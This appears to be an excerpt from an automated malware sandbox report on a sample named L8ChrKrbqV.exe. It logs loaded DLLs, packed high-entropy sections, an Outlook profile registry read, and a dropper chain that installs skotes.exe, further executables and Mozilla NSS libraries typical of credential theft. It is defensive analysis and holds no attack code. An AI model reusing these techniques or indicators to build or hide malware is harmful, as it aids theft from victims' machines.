Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Section loaded: dnsapi.dll

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.14.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.14.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.14.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.14.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.14.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.14.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: L8ChrKrbqV.exe

Static file information: File size 1883648 > 1048576

Source: L8ChrKrbqV.exe

Static PE information: Raw size of ztyvjqnb is bigger than: 0x100000 < 0x19f800

Source:	Binary string: mozglue.pdbP source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1892351376.000000007004D000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: freebl3.pdb source: freebl3.dll.9.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.9.dr
Source:	Binary string: nss3.pdb@ source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1892112569.000000006CD1F000.00000002.00000001.01000000.0000000D.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.9.dr, vcruntime140.dll.9.dr
Source:	Binary string: nss3.pdb source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1892112569.000000006CD1F000.00000002.00000001.01000000.0000000D.sdmp, nss3.dll.9.dr, nss3[1].dll.9.dr
Source:	Binary string: mozglue.pdb source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe, 00000009.00000002.1892351376.000000007004D000.00000002.00000001.01000000.0000000E.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Unpacked PE file: 9.2.XAWR7RW45EPTK4VDBU7Q3V5ELG.exe.490000.0.unpack :EW;.rsrc:W;.idata :W; :EW;cunjkufl:EW;rcbudadh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;cunjkufl:EW;rcbudadh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Unpacked PE file: 10.2.NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe.850000.0.unpack :EW;.rsrc:W;.idata :W;pwdhnagr:EW;yokffkgo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;pwdhnagr:EW;yokffkgo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 12.2.skotes.exe.5b0000.0.unpack :EW;.rsrc:W;.idata :W;pwdhnagr:EW;yokffkgo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;pwdhnagr:EW;yokffkgo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 13.2.skotes.exe.5b0000.0.unpack :EW;.rsrc:W;.idata :W;pwdhnagr:EW;yokffkgo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;pwdhnagr:EW;yokffkgo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 24.2.skotes.exe.5b0000.0.unpack :EW;.rsrc:W;.idata :W;pwdhnagr:EW;yokffkgo:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;pwdhnagr:EW;yokffkgo:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Unpacked PE file: 25.2.d40ec5ca11.exe.250000.0.unpack :EW;.rsrc:W;.idata :W;gdecrmxh:EW;wcgcpfmy:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;gdecrmxh:EW;wcgcpfmy:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Unpacked PE file: 26.2.cab7dbccac.exe.90000.0.unpack :EW;.rsrc:W;.idata :W; :EW;uaasctnp:EW;ajzeowzq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;uaasctnp:EW;ajzeowzq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Unpacked PE file: 27.2.ab13ed0cb0.exe.3b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;efrqcofg:EW;yqrfybbc:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: random[1].exe1.24.dr

Static PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe.0.dr	Static PE information: real checksum: 0x1bac68 should be: 0x1b3ef9
Source: d40ec5ca11.exe.24.dr	Static PE information: real checksum: 0x6428f2 should be: 0x64054e
Source: skotes.exe.10.dr	Static PE information: real checksum: 0x2d402f should be: 0x2e154b
Source: cab7dbccac.exe.24.dr	Static PE information: real checksum: 0x1cc52d should be: 0x1cfd1f
Source: random[1].exe.24.dr	Static PE information: real checksum: 0x6428f2 should be: 0x64054e
Source: ab13ed0cb0.exe.24.dr	Static PE information: real checksum: 0x1bb953 should be: 0x1c86bc
Source: L8ChrKrbqV.exe	Static PE information: real checksum: 0x1da42d should be: 0x1cda61
Source: random[1].exe1.24.dr	Static PE information: real checksum: 0x1bb953 should be: 0x1c86bc
Source: NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe.0.dr	Static PE information: real checksum: 0x2d402f should be: 0x2e154b
Source: random[1].exe0.24.dr	Static PE information: real checksum: 0x1cc52d should be: 0x1cfd1f

Source: L8ChrKrbqV.exe	Static PE information: section name:
Source: L8ChrKrbqV.exe	Static PE information: section name: .idata
Source: L8ChrKrbqV.exe	Static PE information: section name:
Source: L8ChrKrbqV.exe	Static PE information: section name: ztyvjqnb
Source: L8ChrKrbqV.exe	Static PE information: section name: cqxpurne
Source: L8ChrKrbqV.exe	Static PE information: section name: .taggant
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe.0.dr	Static PE information: section name:
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe.0.dr	Static PE information: section name: .idata
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe.0.dr	Static PE information: section name:
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe.0.dr	Static PE information: section name: cunjkufl
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe.0.dr	Static PE information: section name: rcbudadh
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe.0.dr	Static PE information: section name: .taggant
Source: NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe.0.dr	Static PE information: section name:
Source: NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe.0.dr	Static PE information: section name: .idata
Source: NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe.0.dr	Static PE information: section name: pwdhnagr
Source: NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe.0.dr	Static PE information: section name: yokffkgo
Source: NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe.0.dr	Static PE information: section name: .taggant
Source: freebl3.dll.9.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.9.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.9.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.9.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.9.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.9.dr	Static PE information: section name: .didat
Source: nss3.dll.9.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.9.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.9.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.9.dr	Static PE information: section name: .00cfg
Source: skotes.exe.10.dr	Static PE information: section name:
Source: skotes.exe.10.dr	Static PE information: section name: .idata
Source: skotes.exe.10.dr	Static PE information: section name: pwdhnagr
Source: skotes.exe.10.dr	Static PE information: section name: yokffkgo
Source: skotes.exe.10.dr	Static PE information: section name: .taggant
Source: random[1].exe.24.dr	Static PE information: section name:
Source: random[1].exe.24.dr	Static PE information: section name: .idata
Source: random[1].exe.24.dr	Static PE information: section name: gdecrmxh
Source: random[1].exe.24.dr	Static PE information: section name: wcgcpfmy
Source: random[1].exe.24.dr	Static PE information: section name: .taggant
Source: d40ec5ca11.exe.24.dr	Static PE information: section name:
Source: d40ec5ca11.exe.24.dr	Static PE information: section name: .idata
Source: d40ec5ca11.exe.24.dr	Static PE information: section name: gdecrmxh
Source: d40ec5ca11.exe.24.dr	Static PE information: section name: wcgcpfmy
Source: d40ec5ca11.exe.24.dr	Static PE information: section name: .taggant
Source: random[1].exe0.24.dr	Static PE information: section name:
Source: random[1].exe0.24.dr	Static PE information: section name: .idata
Source: random[1].exe0.24.dr	Static PE information: section name:
Source: random[1].exe0.24.dr	Static PE information: section name: uaasctnp
Source: random[1].exe0.24.dr	Static PE information: section name: ajzeowzq
Source: random[1].exe0.24.dr	Static PE information: section name: .taggant
Source: cab7dbccac.exe.24.dr	Static PE information: section name:
Source: cab7dbccac.exe.24.dr	Static PE information: section name: .idata
Source: cab7dbccac.exe.24.dr	Static PE information: section name:
Source: cab7dbccac.exe.24.dr	Static PE information: section name: uaasctnp
Source: cab7dbccac.exe.24.dr	Static PE information: section name: ajzeowzq
Source: cab7dbccac.exe.24.dr	Static PE information: section name: .taggant
Source: random[1].exe1.24.dr	Static PE information: section name:
Source: random[1].exe1.24.dr	Static PE information: section name: .idata
Source: random[1].exe1.24.dr	Static PE information: section name:
Source: random[1].exe1.24.dr	Static PE information: section name: efrqcofg
Source: random[1].exe1.24.dr	Static PE information: section name: yqrfybbc
Source: random[1].exe1.24.dr	Static PE information: section name: .taggant
Source: ab13ed0cb0.exe.24.dr	Static PE information: section name:
Source: ab13ed0cb0.exe.24.dr	Static PE information: section name: .idata
Source: ab13ed0cb0.exe.24.dr	Static PE information: section name:
Source: ab13ed0cb0.exe.24.dr	Static PE information: section name: efrqcofg
Source: ab13ed0cb0.exe.24.dr	Static PE information: section name: yqrfybbc
Source: ab13ed0cb0.exe.24.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_01192389 push eax; retf	0_3_011923C2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_01192389 push eax; retf	0_3_011923C2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_01192389 push eax; retf	0_3_011923C2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_01192389 push eax; retf	0_3_011923C2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_011933BF push edx; iretd	0_3_011933E2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_011933BF push edx; iretd	0_3_011933E2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_011933BF push edx; iretd	0_3_011933E2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_011933BF push edx; iretd	0_3_011933E2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_011933BF push edx; iretd	0_3_011933E2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_011933BF push edx; iretd	0_3_011933E2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_011933BF push edx; iretd	0_3_011933E2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_01193B78 push ebx; retf	0_3_01193BC2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_01193B78 push ebx; retf	0_3_01193BC2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_01193B78 push ebx; retf	0_3_01193BC2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_01193B78 push ebx; retf	0_3_01193BC2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_01193B78 push ebx; retf	0_3_01193BC2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_01193B78 push ebx; retf	0_3_01193BC2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_01193B78 push ebx; retf	0_3_01193BC2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_01192389 push eax; retf	0_3_011923C2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_01192389 push eax; retf	0_3_011923C2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_01192389 push eax; retf	0_3_011923C2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_01192389 push eax; retf	0_3_011923C2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_011933BF push edx; iretd	0_3_011933E2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_011933BF push edx; iretd	0_3_011933E2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_011933BF push edx; iretd	0_3_011933E2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_011933BF push edx; iretd	0_3_011933E2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_011933BF push edx; iretd	0_3_011933E2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_011933BF push edx; iretd	0_3_011933E2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_011933BF push edx; iretd	0_3_011933E2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_01193B78 push ebx; retf	0_3_01193BC2
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	Code function: 0_3_01193B78 push ebx; retf	0_3_01193BC2

Source: L8ChrKrbqV.exe	Static PE information: section name: entropy: 7.979736301677224
Source: L8ChrKrbqV.exe	Static PE information: section name: ztyvjqnb entropy: 7.954220387174143
Source: XAWR7RW45EPTK4VDBU7Q3V5ELG.exe.0.dr	Static PE information: section name: cunjkufl entropy: 7.9545524091741235
Source: NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe.0.dr	Static PE information: section name: entropy: 7.9828189730038845
Source: skotes.exe.10.dr	Static PE information: section name: entropy: 7.9828189730038845
Source: random[1].exe0.24.dr	Static PE information: section name: entropy: 7.974223852879901
Source: random[1].exe0.24.dr	Static PE information: section name: uaasctnp entropy: 7.954177065663414
Source: cab7dbccac.exe.24.dr	Static PE information: section name: entropy: 7.974223852879901
Source: cab7dbccac.exe.24.dr	Static PE information: section name: uaasctnp entropy: 7.954177065663414
Source: random[1].exe1.24.dr	Static PE information: section name: entropy: 7.966652808119376
Source: random[1].exe1.24.dr	Static PE information: section name: efrqcofg entropy: 7.9532683612246755
Source: ab13ed0cb0.exe.24.dr	Static PE information: section name: entropy: 7.966652808119376
Source: ab13ed0cb0.exe.24.dr	Static PE information: section name: efrqcofg entropy: 7.9532683612246755

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062808001\cab7dbccac.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	File created: C:\Users\user\AppData\Local\Temp\NCRJ1W24K8MKO4IJ9PNO8SLI1W784.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062807001\d40ec5ca11.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062809001\ab13ed0cb0.exe	Jump to dropped file
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	File created: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ONMZACOW\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GIBVL2EB\random[1].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\XAWR7RW45EPTK4VDBU7Q3V5ELG.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
